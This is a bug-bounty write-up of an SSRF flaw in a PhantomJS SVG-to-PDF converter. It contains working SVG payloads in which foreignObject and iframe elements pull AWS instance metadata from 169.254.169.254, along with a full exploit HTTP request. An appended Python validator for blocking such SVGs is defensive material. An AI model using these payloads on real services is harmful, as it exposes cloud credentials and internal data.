
SSRF in PDF Renderer using SVG

In the name of Allah, the Most Gracious, the Most Merciful

Some information in this post, such as the target URL, the endpoint, and several other details, was modified to protect the privacy of the program.


Some time ago, I had the opportunity to do bug hunting in one of the private programs on Bugcrowd. This program covers a complex application with various features; one of the highlights is converting SVG objects into PDF, JPG, and PNG files.

I. Initial Test - Sending HTML Tag

When I found a feature that creates PDFs from user-supplied data, I immediately ran an experiment to attempt an SSRF attack by replacing the SVG code sent to the server with HTML containing an iframe tag pointed at Burp Collaborator.

POST /convert HTTP/2
Host: target.com
Cookie: -
Content-Length: -
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBdAsEtYaBjTArl3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,eu;q=0.6,ms;q=0.5
Connection: close

------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="svg"


<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--

But unfortunately, the server responded with an error message.

{"message": "Error when converting data."}

It looks like the server can only process input that is a valid SVG file.

II. Embedding HTML using foreignObject

After doing some googling, I found that HTML code can be embedded in SVG code using an element named foreignObject.

"The <foreignObject> SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML."

Source: https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject

So I changed the payload to be like this:

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
  <g>
    <foreignObject width="800" height="500">
      <body xmlns="http://www.w3.org/1999/xhtml">
      <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
      </body>
    </foreignObject>
  </g>
</svg>

After getting a hit on the Burp Collaborator client, I checked the IP address that made the request; it turned out that the application runs on Amazon Web Services, and from the User-Agent I noticed that the SVG is rendered using PhantomJS.

So I modified the payload to exfiltrate the metadata of the AWS instance.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
  <g>
    <foreignObject width="800" height="500">
      <body xmlns="http://www.w3.org/1999/xhtml">
      <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
      </body>
    </foreignObject>
  </g>
</svg>

And metadata was successfully obtained.

Figure 1 - Retrieving AWS Metadata via PDF File

I immediately reported this finding; it was marked as P1 and I was rewarded $2,150.
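As an added, defender-side example that is not part of the original post: a Python allow-list check that a conversion service could run before handing user-supplied SVG to a headless renderer like PhantomJS. It rejects a non-SVG root element, foreignObject/script elements, and any href/src attribute with a network scheme, so both payloads shown above are refused; the sample documents, and the example.invalid URL, are constructed for this demo.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Elements that let an SVG pull HTML or script into the render; a headless
# browser will load an <iframe> found inside a <foreignObject> just like a page.
FORBIDDEN_ELEMENTS = {"foreignobject", "script", "iframe", "object", "embed"}
# Attributes (by local name, so xlink:href collapses to href) that carry a URL.
URL_ATTRIBUTES = {"href", "src"}

def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1].lower()

def _is_external(value: str) -> bool:
    """True for any URL with a network or file scheme; fragment references
    (#id) and inline data: URLs are allowed."""
    return urlsplit(value.strip()).scheme.lower() not in ("", "data")

def check_svg(document: str) -> tuple[bool, str]:
    """Allow-list check to run before the renderer sees user SVG.
    Returns (accepted, reason)."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if _local(root.tag) != "svg":
        return False, f"root element is <{_local(root.tag)}>, expected <svg>"
    for elem in root.iter():  # document order, root included
        name = _local(elem.tag)
        if name in FORBIDDEN_ELEMENTS:
            return False, f"forbidden element <{name}>"
        for attr, value in elem.attrib.items():
            if _local(attr) in URL_ATTRIBUTES and _is_external(value):
                return False, f"external reference in {_local(attr)}={value!r}"
    return True, "ok"

# Constructed samples: the post's foreignObject payload, the bare <iframe> from
# the first attempt, an <image> pulling a remote file, and a harmless drawing.
FOREIGN_OBJECT_PAYLOAD = """<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="800" height="500">
  <foreignObject width="800" height="500"><body xmlns="http://www.w3.org/1999/xhtml">
    <iframe src="http://169.254.169.254/latest/meta-data/"></iframe></body></foreignObject>
</svg>"""
BARE_IFRAME = '<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>'
REMOTE_IMAGE = '<svg xmlns="http://www.w3.org/2000/svg"><image href="http://example.invalid/x.png"/></svg>'
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              '<rect width="10" height="10" fill="#f00"/><use href="#shape"/></svg>')

if __name__ == "__main__":
    for sample in (FOREIGN_OBJECT_PAYLOAD, BARE_IFRAME, REMOTE_IMAGE, BENIGN_SVG):
        print(check_svg(sample))
```

Input filtering is only a complement to the primary control: the check does not inspect CSS url() references in style attributes, so the renderer itself should run with no network route to 169.254.169.254 or other internal addresses.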

This post is licensed under CC BY 4.0 by the author.
